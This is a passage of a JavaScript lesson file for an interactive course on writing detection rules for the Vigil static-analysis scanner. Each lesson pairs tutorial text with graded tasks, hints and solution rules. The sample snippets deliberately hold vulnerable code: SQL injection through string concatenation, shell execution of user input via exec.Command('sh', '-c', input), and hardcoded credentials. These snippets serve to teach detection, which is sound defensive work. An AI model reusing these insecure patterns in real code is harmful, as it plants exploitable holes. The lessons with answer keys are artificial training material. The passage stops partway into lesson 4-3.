export const LESSONS = [
  {
    id: '1-1',
    level: 'novice',
    levelLabel: 'Novice',
    levelEmoji: '🌱',
    module: 1,
    moduleTitle: 'Rule Anatomy',
    title: 'Your First Rule',
    xp: 100,
    theory: `## Rule Anatomy

A Vigil rule is a YAML document that tells the scanner what patterns to look for in source code. Every rule has the same skeleton:

\`\`\`yaml
rule my-first-rule:
  version: "1.0.0"
  severity: medium
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "fmt.Println(...)"

  report:
    message: "Remove debug prints before production."
\`\`\`

### Required fields

- \`id\` — unique machine-readable name (kebab-case)
- \`version\` — semantic version of the rule
- \`severity\` — one of: \`critical\`, \`high\`, \`medium\`, \`low\`, \`info\`
- \`languages\` — list of target languages, e.g. \`[go]\`, \`[python, javascript]\`
- \`query\` — the detection logic (more on this soon)
- \`report\` — what to show the developer when a match is found

### The query block

The most common query command is \`find pattern\`. It takes a code pattern in quotes and finds every place in the scanned file that matches that shape.

The pattern \`"fmt.Println(...)"\` matches any call to \`fmt.Println\` with any arguments. The \`...\` (ellipsis) stands for "zero or more things" — you'll learn more about it in lesson 1-3.

### The report block

\`title\` is a short headline shown in the findings list.
\`message\` is the human-readable explanation shown to the developer.
You can embed captured metavariables in messages using \`$NAME\` notation.`,
    task: 'Find all calls to fmt.Println in the Go snippet (not fmt.Printf)',
    language: 'go',
    snippet: `import "fmt"
func main() {
  fmt.Println("debug message")
  fmt.Println("another debug line")
  fmt.Printf("format: %s\\n", "x")
}`,
    starterRule: `rule debug-print:
  version: "1.0"
  severity: low
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "???"

  report:
    message: "Remove debug print statements"`,
    assertions: {
      minFindings: 2,
      maxFindings: 2,
      mustMatch: ['fmt.Println'],
      mustNotMatch: ['fmt.Printf'],
    },
    hints: [
      'Use the `find pattern` query to match code patterns',
      'The pattern should look like the function call, with `(...)` for any arguments',
      'Try: find pattern "fmt.Println(...)"',
    ],
    solution: `rule debug-print:
  version: "1.0"
  severity: low
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "fmt.Println(...)"

  report:
    message: "Remove debug print statements"`,
  },

  {
    id: '1-2',
    level: 'novice',
    levelLabel: 'Novice',
    levelEmoji: '🌱',
    module: 1,
    moduleTitle: 'Rule Anatomy',
    title: 'Metavariables',
    xp: 150,
    theory: `## Metavariables

A **metavariable** is a wildcard that matches and captures any identifier in source code. Metavariables always start with \`$\` followed by an **uppercase** name.

### Common metavariable names

- \`$NAME\` — captures a function or variable name
- \`$VAR\` — captures any variable identifier
- \`$FUNC\` — captures a function reference
- \`$ARG\` — captures a single argument

### How they work

When the engine sees \`func $NAME() {}\`, it matches any zero-parameter, no-return-type function with an empty body — and records what identifier was captured as \`$NAME\`.

\`\`\`yaml
query: |
  find pattern "func $NAME() {}"
report:
  message: Function $NAME has an empty body
\`\`\`

In the \`report.message\`, \`$NAME\` is replaced with the actual name found — e.g. "Function initialize has an empty body".

### Structural matching

If you use the **same** metavariable **twice** in one pattern, both occurrences must match the **same** value:

\`\`\`yaml
find pattern "$VAR := $VAR"   # matches x := x (same on both sides)
\`\`\`

This is how Vigil can catch copy-paste bugs and self-assignments.

### What \`{}\` means

An empty \`{}\` in a pattern matches an **empty block** — a function body with no statements inside it. This is different from \`{...}\` which would match any block.`,
    task: 'Find all functions with an empty body AND no parameters AND no return type',
    language: 'go',
    snippet: `func initialize() {}
func configure() {}
func processData(input string) string { return input }
func withReturn() string { return "" }`,
    starterRule: `rule empty-functions:
  version: "1.0"
  severity: info
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "func $NAME() ???"

  report:
    message: "Function $NAME has an empty body"`,
    assertions: {
      minFindings: 2,
      maxFindings: 2,
      mustMatch: ['initialize'],
      mustNotMatch: ['processData'],
    },
    hints: [
      'Metavariables like `$NAME` match any identifier',
      'Match the function signature with `$NAME` for the name and `{}` for the empty body',
      'Try: find pattern "func $NAME() {}"',
    ],
    solution: `rule empty-functions:
  version: "1.0"
  severity: info
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "func $NAME() {}"

  report:
    message: "Function $NAME has an empty body"`,
  },

  {
    id: '1-3',
    level: 'novice',
    levelLabel: 'Novice',
    levelEmoji: '🌱',
    module: 1,
    moduleTitle: 'Rule Anatomy',
    title: 'The Ellipsis Operator',
    xp: 150,
    theory: `## The Ellipsis Operator

The ellipsis \`...\` is one of the most powerful tools in Vigil patterns. It matches **zero or more** of anything — arguments, statements, or expressions.

### In function calls

\`\`\`yaml
find pattern "exec.Command(...)"
\`\`\`

This matches ALL of these:
- \`exec.Command("ls")\`
- \`exec.Command("ls", "-la")\`
- \`exec.Command("sh", "-c", userInput, extraArg)\`

Without \`...\`, you would need a separate pattern for each argument count.

### In function bodies

\`\`\`yaml
find pattern "func $NAME(...) { ... }"
\`\`\`

Here, the first \`...\` matches any parameters (zero or more), and the second \`...\` inside \`{}\` matches any body content.

### Ellipsis vs metavariable

| Syntax | Matches |
|--------|---------|
| \`...\` | Zero or more arguments / statements (not captured) |
| \`$ARG\` | Exactly **one** expression (captured as a value) |

### Why it matters for security rules

When detecting dangerous function calls like \`exec.Command\`, \`os.Open\`, or \`sql.Query\`, you almost always want to match the call **regardless of how many arguments** are passed. The ellipsis makes this trivial.`,
    task: 'Find ALL calls to exec.Command regardless of how many arguments are passed',
    language: 'go',
    snippet: `import "os/exec"
func safe() {
  cmd := exec.Command("ls", "-la")
  cmd2 := exec.Command("echo", "hello", "world")
  cmd3 := exec.Command("cat", "/etc/passwd", "-n", "--verbose")
}`,
    starterRule: `rule exec-command:
  version: "1.0"
  severity: high
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "exec.Command(???)"

  report:
    message: "Potential command injection risk"`,
    assertions: {
      minFindings: 3,
      maxFindings: 3,
      mustMatch: ['exec.Command'],
    },
    hints: [
      'Use `...` to match any number of arguments',
      'Put `...` inside the parentheses to match any call',
      'Try: find pattern "exec.Command(...)"',
    ],
    solution: `rule exec-command:
  version: "1.0"
  severity: high
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "exec.Command(...)"

  report:
    message: "Potential command injection risk"`,
  },

  {
    id: '2-1',
    level: 'beginner',
    levelLabel: 'Beginner',
    levelEmoji: '🌿',
    module: 2,
    moduleTitle: 'Refining Matches',
    title: 'Not Pattern',
    xp: 200,
    theory: `## Not Pattern

A bare \`find pattern\` will catch everything that matches — including cases that are actually fine. The \`not pattern\` operator lets you **exclude** specific shapes from your results, dramatically reducing false positives.

### Syntax

\`\`\`yaml
query: |
  find pattern "func $NAME() {}"
  not pattern "func $NAME() $TYPE {}"
\`\`\`

The engine first finds all matches for \`find pattern\`, then **removes** any match that also matches a \`not pattern\` line.

### Stacking exclusions

You can add as many \`not pattern\` lines as you need:

\`\`\`yaml
query: |
  find pattern "os.Open($PATH)"
  not pattern "os.Open(\\".\\")"
  not pattern "os.Open(\\"./\\")"
\`\`\`

### Real-world example

Detecting \`http.ListenAndServe\` without TLS:

\`\`\`yaml
find pattern "http.ListenAndServe($ADDR, $HANDLER)"
not pattern "http.ListenAndServeTLS(...)"
\`\`\`

### Order matters

\`find pattern\` always comes first. All \`not pattern\` lines apply to the results of the \`find pattern\` above them. You cannot use \`not pattern\` without a preceding \`find pattern\`.`,
    task: 'Find empty functions with no params AND no return type. Exclude functions that have a return type.',
    language: 'go',
    snippet: `func emptyNoReturn() {}
func emptyWithReturn() string { return "" }
func alsoEmpty() {}
func withBody() { println("hi") }`,
    starterRule: `rule truly-empty-functions:
  version: "1.0"
  severity: info
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "func $NAME() {}"
    ??? pattern "func $NAME() $TYPE {}"

  report:
    message: "Function $NAME is empty"`,
    assertions: {
      minFindings: 2,
      maxFindings: 2,
      mustMatch: ['emptyNoReturn'],
      mustNotMatch: ['emptyWithReturn'],
    },
    hints: [
      'Start with `find pattern "func $NAME() {}"`',
      'Use `not pattern` on the next line to exclude cases with a return type',
      'Add: not pattern "func $NAME() $TYPE {}"',
    ],
    solution: `rule truly-empty-functions:
  version: "1.0"
  severity: info
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "func $NAME() {}"
    not pattern "func $NAME() $TYPE {}"

  report:
    message: "Function $NAME is empty"`,
  },

  {
    id: '2-2',
    level: 'beginner',
    levelLabel: 'Beginner',
    levelEmoji: '🌿',
    module: 2,
    moduleTitle: 'Refining Matches',
    title: 'Severity Classification',
    xp: 150,
    theory: `## Severity Classification

Every rule must declare how serious a finding is. Choosing the right severity is critical — miscategorised findings erode developer trust.

### Severity levels

| Level | When to use | Examples |
|-------|-------------|---------|
| \`critical\` | Immediate exploitation possible | RCE, data breach, auth bypass with no preconditions |
| \`high\` | Significant risk, likely exploitable | SQL injection, hardcoded credentials, command injection |
| \`medium\` | Risk requires specific conditions | Information disclosure, insecure defaults |
| \`low\` | Code quality / minor risk | Debug prints, unused errors, TODOs |
| \`info\` | Style / informational only | Empty functions, naming conventions |

### Confidence

Some engines also support a \`confidence\` field alongside severity:

- \`high\` — the rule almost never produces false positives
- \`medium\` — the pattern is probably a problem but context matters
- \`low\` — the pattern might be a problem; needs human review

### EU CRA alignment

Under the EU Cyber Resilience Act, vendors must address \`critical\` and \`high\` findings before shipping. Your severity classification directly feeds compliance dashboards and policy gates.

### Rule of thumb

When in doubt: **escalate, don't downgrade**. A missed critical is far more damaging than a false-positive high. Developers can suppress findings; they can't un-exploit a vulnerability.`,
    task: 'Write a HIGH severity rule to detect hardcoded password assignments',
    language: 'go',
    snippet: `func connectDB() {
  password := "super_secret_pass_123"
  apiKey := "sk-abc123def456"
  safeVar := os.Getenv("DB_PASSWORD")
}`,
    starterRule: `rule hardcoded-password:
  version: "1.0"
  severity: ???
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "password := \\"$VAL\\""

  report:
    message: "Password should not be hardcoded"`,
    assertions: {
      minFindings: 1,
      maxFindings: 1,
      mustMatch: ['password :='],
    },
    hints: [
      'Set severity to `high` for credential exposure',
      'Use a metavariable `$VAL` for the password value',
      'Try: find pattern "password := \\"$VAL\\""',
    ],
    solution: `rule hardcoded-password:
  version: "1.0"
  severity: high
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "password := \\"$VAL\\""

  report:
    message: "Password '$VAL' should not be hardcoded - use environment variables"`,
  },

  {
    id: '2-3',
    level: 'beginner',
    levelLabel: 'Beginner',
    levelEmoji: '🌿',
    module: 2,
    moduleTitle: 'Refining Matches',
    title: 'Multi-Language Rules',
    xp: 200,
    theory: `## Multi-Language Rules

Vigil rules can target **multiple programming languages at once**. This is especially powerful for security policies that should apply everywhere, regardless of language.

### Syntax

\`\`\`yaml
languages: [go, python, javascript]
\`\`\`

The engine runs the same query against each language's AST. Patterns are written in a language-agnostic notation, and the engine translates them to each target language's syntax automatically.

### Language-specific patterns

When a pattern only makes sense in one language, you can still include that language in the list and use language-specific syntax:

\`\`\`yaml
languages: [javascript, typescript]
query: |
  find pattern "const $VAR = \\"$VAL\\""
\`\`\`

This pattern is valid JavaScript/TypeScript syntax and will only produce matches in those languages.

### Supported languages

Vigil currently supports: \`go\`, \`python\`, \`javascript\`, \`typescript\`, \`java\`, \`csharp\`, \`ruby\`

### Why multi-language rules matter

In a polyglot codebase (e.g. Go backend + JavaScript frontend + Python scripts), a single rule like "no hardcoded secrets" should apply everywhere. Without multi-language support, you'd need to maintain separate rules for each language — and inevitably miss one.`,
    task: 'Find hardcoded API key assignments in JavaScript (const declarations)',
    language: 'javascript',
    snippet: `const apiKey = "sk-abc123";
const token = "Bearer eyJhbGc";
const safeKey = process.env.API_KEY;`,
    starterRule: `rule hardcoded-api-keys:
  version: "1.0"
  severity: high
  confidence: high
  languages: [javascript]
  cwe: []

  query: |
    find pattern "const $VAR = \\"$VAL\\""

  report:
    message: "API key should not be hardcoded"`,
    assertions: {
      minFindings: 2,
      maxFindings: 2,
      mustMatch: ['apiKey'],
      mustNotMatch: ['safeKey'],
    },
    hints: [
      'JavaScript uses `const` for constant declarations',
      'Use `$VAR` for the variable name and `$VAL` for the string value',
      'Try: find pattern "const $VAR = \\"$VAL\\""',
    ],
    solution: `rule hardcoded-api-keys:
  version: "1.0"
  severity: high
  confidence: high
  languages: [javascript]
  cwe: []

  query: |
    find pattern "const $VAR = \\"$VAL\\""

  report:
    message: "Variable '$VAR' contains a hardcoded secret"`,
  },

  {
    id: '3-1',
    level: 'intermediate',
    levelLabel: 'Intermediate',
    levelEmoji: '🌳',
    module: 3,
    moduleTitle: 'Advanced Analysis',
    title: 'Taint Flow',
    xp: 300,
    theory: `## Taint Flow Analysis

Pattern matching finds **shapes** in code. Taint flow analysis finds **data movement** — tracking how a value flows from a dangerous source to a dangerous sink.

### Concepts

Vigil uses named semantic groups called **concepts** (prefixed with \`@\`) to label categories of code:

- \`@user_input\` — function parameters, HTTP request fields, form values
- \`@sql.execute\` — database query execution calls
- \`@file.write\` — file write operations
- \`@logging.write\` — logging calls
- \`@http.outbound_request\` — outbound network calls

### Taint flow syntax

\`\`\`yaml
query: |
  find flow from @user_input to @sql.execute
\`\`\`

The engine traces how data moves through:
- **Variable assignments** — \`x = req.params.id\`
- **String concatenation** — \`"SELECT * WHERE id = " + x\`
- **Function calls** — passing tainted values as arguments

### Why this catches what patterns miss

A pattern like \`find pattern "cursor.execute($QUERY)"\` would match ALL execute calls — safe and unsafe. Taint flow only fires when the \`$QUERY\` value **originates from user input**, eliminating false positives for parameterized queries.

### The SQL injection example

\`\`\`python
# FLAGGED — user_id flows from parameter to execute()
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)

# SAFE — parameterized query, no taint flow
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
\`\`\``,
    task: 'Write a SQL injection detection rule using taint flow analysis',
    language: 'python',
    snippet: `def get_user(user_id):
    query = "SELECT * FROM users WHERE id = " + user_id
    cursor.execute(query)

def safe_query(user_id):
    cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))`,
    starterRule: `rule sql-injection:
  version: "1.0"
  severity: critical
  confidence: high
  languages: [python]
  cwe: []

  query: |
    find flow from ??? to @sql.execute

  report:
    message: "User input flows directly to SQL query"`,
    assertions: {
      minFindings: 1,
      mustMatch: ['user_id'],
    },
    hints: [
      'This is a taint flow rule — use `find flow from ... to ...`',
      'User input is captured by the concept `@user_input`',
      'Try: find flow from @user_input to @sql.execute',
    ],
    solution: `rule sql-injection:
  version: "1.0"
  severity: critical
  confidence: high
  languages: [python]
  cwe: []

  query: |
    find flow from @user_input to @sql.execute

  report:
    message: "User input flows directly to SQL query without sanitization"`,
  },

  {
    id: '3-2',
    level: 'intermediate',
    levelLabel: 'Intermediate',
    levelEmoji: '🌳',
    module: 3,
    moduleTitle: 'Advanced Analysis',
    title: 'Where Clauses',
    xp: 300,
    theory: `## Where Clauses

Where clauses add **conditions** to pattern matches. They let you narrow findings to specific contexts — making your rules more precise without sacrificing coverage.

### Syntax

\`\`\`yaml
query: |
  find pattern "func $NAME(...) { ... }"
  where calls @dangerous-func
\`\`\`

The \`where\` line is evaluated for each candidate match. Only matches satisfying the condition are reported.

### Available conditions

| Condition | Meaning |
|-----------|---------|
| \`where calls @concept\` | The matched code must call a function in the named concept |
| \`where not calls @concept\` | The matched code must NOT call any function in the concept |
| \`where $VAR matches "regex"\` | A captured metavariable must match the regex |
| \`where $VAR not matches "regex"\` | A metavariable must NOT match the regex |

### Example: finding risky HTTP handlers

\`\`\`yaml
find pattern "func $NAME(w http.ResponseWriter, r *http.Request) { ... }"
where calls @sql.execute
\`\`\`

This finds HTTP handlers that make direct database calls — a common source of injection vulnerabilities.

### Example: regex condition

\`\`\`yaml
find pattern "const $VAR = \\"$VAL\\""
where $VAR matches "(?i)(key|token|secret|password|api)"
\`\`\`

This only fires when the variable name looks like a credential.

### Performance tip

Where clauses are evaluated **after** pattern matching. Put the most selective condition first to reduce engine work.`,
    task: 'Find all calls to exec.Command in Go (OS command execution risk)',
    language: 'go',
    snippet: `import "os/exec"
func riskyHandler(input string) {
  exec.Command("sh", "-c", input)
}
func safeHandler(input string) {
  sanitized := sanitize(input)
  log.Println(sanitized)
}
func anotherRisky() {
  exec.Command("rm", "-rf", "/tmp/data")
}`,
    starterRule: `rule os-command-exec:
  version: "1.0"
  severity: high
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "exec.Command(???)"

  report:
    message: "Unvalidated command execution detected"`,
    assertions: {
      minFindings: 2,
      mustMatch: ['exec.Command'],
    },
    hints: [
      'Use `find pattern` to match the dangerous function call',
      'The ellipsis `...` matches any number of arguments',
      'Try: find pattern "exec.Command(...)"',
    ],
    solution: `rule os-command-exec:
  version: "1.0"
  severity: high
  confidence: high
  languages: [go]
  cwe: []

  query: |
    find pattern "exec.Command(...)"

  report:
    message: "Ensure exec.Command arguments are validated and not user-controlled"`,
  },
  {
    id: '3-3',
    level: 'advanced',
    levelLabel: 'Advanced',
    levelEmoji: '🔥',
    module: 3,
    moduleTitle: 'Advanced Analysis',
    title: 'Cross-File Flow (Joern)',
    xp: 400,
    theory: `## Cross-File Flow Analysis

Most SAST tools analyse **one file at a time**. This means they miss the most common vulnerability pattern in real-world applications: the source and sink are in *different files*.

### The problem with file-local analysis

Consider a typical Node.js app:

\`\`\`javascript
// routes/user.js — SOURCE FILE
const username = req.query.username;   // user input
db.findUser(username, callback);       // passes to helper
\`\`\`

\`\`\`javascript
// data/db.js — SINK FILE
function findUser(username, cb) {
  db.all("SELECT * FROM users WHERE name = '" + username + "'", cb);
}
\`\`\`

A file-local tool like OpenGrep looks at each file separately:
- **routes/user.js**: no SQL → ❌ no finding
- **data/db.js**: no HTTP input → ❌ no finding

The vulnerability is **invisible** to file-local tools.

### Enter Joern and \`find crossflow\`

Joern builds a **Code Property Graph (CPG)** for the *entire project* — AST, control flow, call graph, and data flow combined into one queryable graph.

\`find crossflow\` runs Joern's \`reachableByFlows\` analysis across the whole CPG, tracing taint through function calls, module imports, and class method invocations.

\`\`\`yaml
query: |
  find crossflow from @user_input to @sql.execute
\`\`\`

This is syntactically identical to \`find flow\`, but:

| | \`find flow\` | \`find crossflow\` |
|-|-------------|-----------------|
| Engine | OpenGrep | Joern |
| Scope | One file | Whole project CPG |
| Finds cross-file vulns | ❌ No | ✅ Yes |
| Speed | Fast (seconds) | Slower (~30s CPG build) |

### When to use \`find crossflow\`

- **MVC / layered architecture**: controller → service → repository
- **Microservices helpers**: route handlers that delegate to utility modules
- **ORM wrappers**: frameworks that hide database calls behind custom abstractions
- **Any code where HTTP input is passed to another function before the sink**

### Complete rule example

\`\`\`yaml
rule js-sqli-cross-file:
  version: "1.0.0"
  severity: high
  confidence: medium
  languages: [javascript]
  cwe: ["CWE-89"]
  owasp: ["A03:2021-Injection"]

  query: |
    find crossflow from @user_input to @sql.execute

  report:
    message: "SQL injection: request data flows across module boundary into SQL query"
    fix: "Use parameterized queries in all database helper modules"
\`\`\`

### OpenGrep safety net

If you accidentally run a \`crossflow\` rule with OpenGrep, Vigil **skips it with a clear warning** — no silent false negatives:

\`\`\`
Warning: skipping rule js-sqli-cross-file:
  uses find-type 'cross-file-flow' which requires interprocedural analysis;
  use the joern engine instead
\`\`\`

### Running cross-file scans

\`\`\`bash
# Explicit Joern engine
vigil scan ./src --rules ./rules --engine joern

# Auto-routing (uses Joern for crossflow rules, OpenGrep for everything else)
vigil scan ./src --rules ./rules --engine auto
\`\`\``,
    task: 'Write a cross-file SQL injection rule for Python. The controller file receives request.args and passes it to a DAO helper that calls cursor.execute()',
    language: 'python',
    snippet: `# controller.py
from flask import request
from dao import UserDAO

dao = UserDAO()

def get_user():
    username = request.args.get('username')
    return dao.find_by_name(username)

# dao.py
import sqlite3

class UserDAO:
    def find_by_name(self, name):
        conn = sqlite3.connect('app.db')
        cursor = conn.cursor()
        cursor.execute(
            "SELECT * FROM users WHERE name = '" + name + "'"
        )
        return cursor.fetchall()

    def find_by_id(self, user_id):
        conn = sqlite3.connect('app.db')
        cursor = conn.cursor()
        cursor.execute(
            "SELECT * FROM users WHERE id = ?", (user_id,)
        )
        return cursor.fetchall()`,
    starterRule: `rule python-cross-file-sqli:
  version: "1.0.0"
  severity: ???
  confidence: medium
  languages: [python]
  cwe: ["CWE-89"]
  owasp: ["A03:2021-Injection"]

  query: |
    find ??? from @user_input to @sql.execute

  report:
    message: "Cross-file SQL injection detected"
    fix: "Use parameterized queries"`,
    assertions: {
      minFindings: 1,
      mustMatch: ['crossflow', 'user_input', 'sql.execute'],
      mustNotMatch: ['find flow'],
    },
    hints: [
      'The vulnerability spans two files — use the interprocedural find type',
      'The keyword for cross-file flow is `crossflow` (not `flow`)',
      'Set severity to `high` — SQLi is a direct injection attack',
      'Try: find crossflow from @user_input to @sql.execute',
    ],
    solution: `rule python-cross-file-sqli:
  version: "1.0.0"
  severity: high
  confidence: medium
  languages: [python]
  cwe: ["CWE-89"]
  owasp: ["A03:2021-Injection"]

  query: |
    find crossflow from @user_input to @sql.execute

  report:
    message: "SQL injection: user input flows from HTTP handler across module boundary into SQL execute. This cross-file taint path is missed by file-local scanners."
    fix: "Use parameterized queries in all DAO/helper layers: cursor.execute('SELECT * FROM users WHERE name = %s', [name])"`,
  },
  {
    id: '4-1',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '⚡',
    module: 4,
    moduleTitle: 'Precision Engineering',
    title: 'Custom Concept Authoring',
    xp: 500,
    theory: `## Custom Concept Authoring

Vigil ships with **85+ built-in concepts** — named abstractions for common source, sink, sanitizer, and guard patterns. Instead of writing brittle string patterns, you reference concepts by name and Vigil resolves them to the correct AST nodes for every language it supports.

### Concept Categories

Every concept belongs to one of four categories:

| Category | Role | Examples |
|----------|------|---------|
| \`source\` | Where tainted data enters the program | \`@user_input\`, \`@pii.email\`, \`@env.variable\` |
| \`sink\` | Where dangerous operations occur | \`@sql.execute\`, \`@logging.call\`, \`@os.exec\` |
| \`sanitizer\` | Where tainted data becomes safe | \`@parameterized_query\`, \`@html.escape\`, \`@crypto.hash\` |
| \`guard\` | Conditional checks that gate access | \`@auth.check\`, \`@rate_limit\` |

### Namespace Convention

Concepts use a dotted \`category.subcategory\` namespace:

\`\`\`yaml
@pii.email       # matches email-shaped strings and variables
@pii.ssn         # Social Security Number patterns
@pii.phone       # phone number patterns (E.164 and regional)
@logging.call    # any logger: log.info(), logger.warn(), print(), console.log()
@sql.execute     # any DB execute: cursor.execute(), db.query(), Session.execute()
\`\`\`

The namespace tells you both the domain (\`pii\`, \`sql\`) and the specific variant (\`email\`, \`execute\`).

### Cross-Language Coverage

A concept that exists for multiple languages fires across all of them. \`@user_input\` covers:

- **Python:** Flask \`request.args\`, Django \`request.GET\`, FastAPI path params
- **Go:** \`r.URL.Query()\`, Gin \`c.Param()\`, Echo \`c.QueryParam()\`
- **JavaScript:** Express \`req.query\`, \`req.body\`, \`req.params\`
- **Java:** \`HttpServletRequest.getParameter()\`, Spring \`@RequestParam\`

If a concept has **no mapping** for a given language, the rule produces zero matches — it does not error. This lets you write multi-language rules that gracefully degrade.

### When to Use Concepts vs Raw Patterns

| Use **concepts** when… | Use **raw patterns** when… |
|----------------------|--------------------------|
| You want cross-framework coverage | The framework is proprietary or rare |
| Matching a whole class of functions | You need very specific matching |
| Future-proofing (new mappings added later) | Prototyping before promoting to a concept |

### Combining Concepts with any()

The \`any()\` operator lets you list multiple concepts as a logical OR:

\`\`\`yaml
find flow from any(@pii.email, @pii.ssn, @pii.phone) to @logging.call
\`\`\`

This single rule catches all three PII types flowing into any logging call — no duplication needed. You can also mix concepts with raw patterns inside \`any()\`, giving you the best of both worlds.`,
    task: 'Write a rule that detects insecure logging of sensitive data — any PII (email, SSN, phone) flowing into a logging call. Use @pii concepts for the source and @logging.call for the sink.',
    language: 'python',
    snippet: `import logging
from flask import Flask, request

app = Flask(__name__)
logger = logging.getLogger(__name__)

@app.route('/register', methods=['POST'])
def register():
    email = request.json.get('email')
    ssn   = request.json.get('ssn')
    phone = request.json.get('phone')
    name  = request.json.get('name')

    # UNSAFE: PII flowing into log statements
    logger.info(f"New registration: {email}")
    logger.debug(f"SSN provided: {ssn}")
    print(f"Phone on file: {phone}")

    # SAFE: logging non-PII field only
    logger.info(f"New user registered: {name}")
    return {"status": "ok"}`,
    starterRule: `rule pii-in-logs:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [python]
  cwe: ["CWE-532"]
  owasp: ["A09:2021-Security-Logging-and-Monitoring-Failures"]

  query: |
    find flow from any(???) to @logging.call

  report:
    message: "PII value flows into a log statement — redact before logging."
    fix: "Mask or omit PII. Use structured logging with explicit field allow-listing."`,
    assertions: {
      minFindings: 3,
      mustMatch: ['flow', '@pii', 'logging', 'any('],
    },
    hints: [
      'Replace ??? with the three PII concepts: @pii.email, @pii.ssn, @pii.phone',
      'The sink concept for any logging framework call is @logging.call',
      'Separate concepts inside any() with commas — any(@pii.email, @pii.ssn, @pii.phone)',
    ],
    solution: `rule pii-in-logs:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [python]
  cwe: ["CWE-532"]
  owasp: ["A09:2021-Security-Logging-and-Monitoring-Failures"]

  query: |
    find flow from any(@pii.email, @pii.ssn, @pii.phone) to @logging.call

  report:
    message: "PII value flows into a log statement — redact before logging."
    fix: "Mask or omit PII in log messages. Use structured logging with explicit field allow-listing."`,
  },
  {
    id: '4-2',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '⚡',
    module: 4,
    moduleTitle: 'Precision Engineering',
    title: 'Sanitizer Guards',
    xp: 500,
    theory: `## Sanitizer Guards

Taint flow rules without sanitizer guards produce **false positives**: they fire even when user input has already been made safe by a parameterized query, an HTML encoder, or another protective function. Sanitizer guards are the precision mechanism that separates a research prototype from a production-grade rule.

### What a Sanitizer Is

A sanitizer is any function or construct that neutralises tainted data before it reaches a dangerous sink:

| Sanitizer | What it neutralises |
|-----------|-------------------|
| Parameterized query (\`cursor.execute("...", params)\`) | SQL injection |
| HTML escape (\`html.escape()\`, Django's \`escape()\`) | XSS |
| URL encode (\`urllib.parse.quote()\`) | Open redirect, header injection |
| Crypto hash (\`hashlib.sha256()\`) | Password leak |

### The Guard Clause in Vigil

Add a \`where not\` clause to exclude flows that pass through a sanitizer:

\`\`\`yaml
query: |
  find flow from @user_input to @sql.execute
  where not passes through @parameterized_query
\`\`\`

**Without the guard:** every SQL query that touches user input fires — including safe parameterized ones.
**With the guard:** only raw string-formatted queries fire. Parameterized calls are excluded.

### Django Example

\`\`\`python
# UNSAFE — raw string concat → should fire
cursor.execute("SELECT * FROM users WHERE id = " + user_id)

# SAFE — parameterized → should NOT fire
cursor.execute("SELECT * FROM users WHERE id = %s", [user_id])

# SAFE — ORM → should NOT fire
User.objects.filter(id=user_id)
\`\`\`

The concept \`@parameterized_query\` matches both the parameterized execute and ORM patterns, so they are excluded from findings automatically.

### Built-in Sanitizer Concepts

| Concept | Covers |
|---------|--------|
| \`@parameterized_query\` | cursor.execute with params, ORM query builders |
| \`@html.escape\` | html.escape(), Django escape(), Jinja autoescape |
| \`@url.encode\` | urllib.parse.quote(), encodeURIComponent() |
| \`@crypto.hash\` | hashlib, bcrypt, argon2, crypto.createHash() |

### Framework-Specific Warning

If the sanitizer concept doesn't cover your framework (e.g., a custom ORM), use a raw pattern instead:

\`\`\`yaml
where not passes through pattern "db.safe_query(...)"
\`\`\`

This gives you the same precision without requiring a built-in concept mapping. Always test with both a vulnerable fixture and a safe fixture (see lesson 5-1) to confirm the guard is working correctly.`,
    task: 'Write a SQLi rule for Django that fires ONLY on raw string-formatted queries. It must NOT fire on parameterized cursor.execute calls or Django ORM .filter()/.get() calls.',
    language: 'python',
    snippet: `from django.db import connection
from django.contrib.auth.models import User
from django.http import HttpResponse

def get_user_unsafe(request):
    user_id = request.GET.get('id')
    # UNSAFE: raw string concat — should fire
    with connection.cursor() as cursor:
        cursor.execute("SELECT * FROM auth_user WHERE id = " + user_id)
        row = cursor.fetchone()
    return HttpResponse(str(row))

def get_user_safe_param(request):
    user_id = request.GET.get('id')
    # SAFE: parameterized — should NOT fire
    with connection.cursor() as cursor:
        cursor.execute("SELECT * FROM auth_user WHERE id = %s", [user_id])
        row = cursor.fetchone()
    return HttpResponse(str(row))

def get_user_safe_orm(request):
    user_id = request.GET.get('id')
    # SAFE: ORM — should NOT fire
    user = User.objects.filter(id=user_id).first()
    return HttpResponse(str(user))`,
    starterRule: `rule django-sqli:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [python]
  cwe: ["CWE-89"]
  owasp: ["A03:2021-Injection"]

  query: |
    find flow from @user_input to @sql.execute

  report:
    message: "SQL injection: unsanitized user input flows into SQL execute."
    fix: "Use cursor.execute with a parameter list, or use the Django ORM."`,
    assertions: {
      minFindings: 1,
      mustMatch: ['where not', 'passes through', '@parameterized_query'],
    },
    hints: [
      'Add a where not clause on the line after find flow',
      'The full syntax is: where not passes through @parameterized_query',
      'The guard tells Vigil: skip any flow that is already sanitized by a parameterized query',
    ],
    solution: `rule django-sqli:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [python]
  cwe: ["CWE-89"]
  owasp: ["A03:2021-Injection"]

  query: |
    find flow from @user_input to @sql.execute
    where not passes through @parameterized_query

  report:
    message: "SQL injection: unsanitized user input flows into SQL execute."
    fix: "Use cursor.execute with a parameter list, or switch to the Django ORM."`,
  },
  {
    id: '4-3',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '⚡',
    module: 4,
    moduleTitle: 'Precision Engineering',
    title: 'any/all Logic',
    xp: 500,
    theory: `## any/all Logic

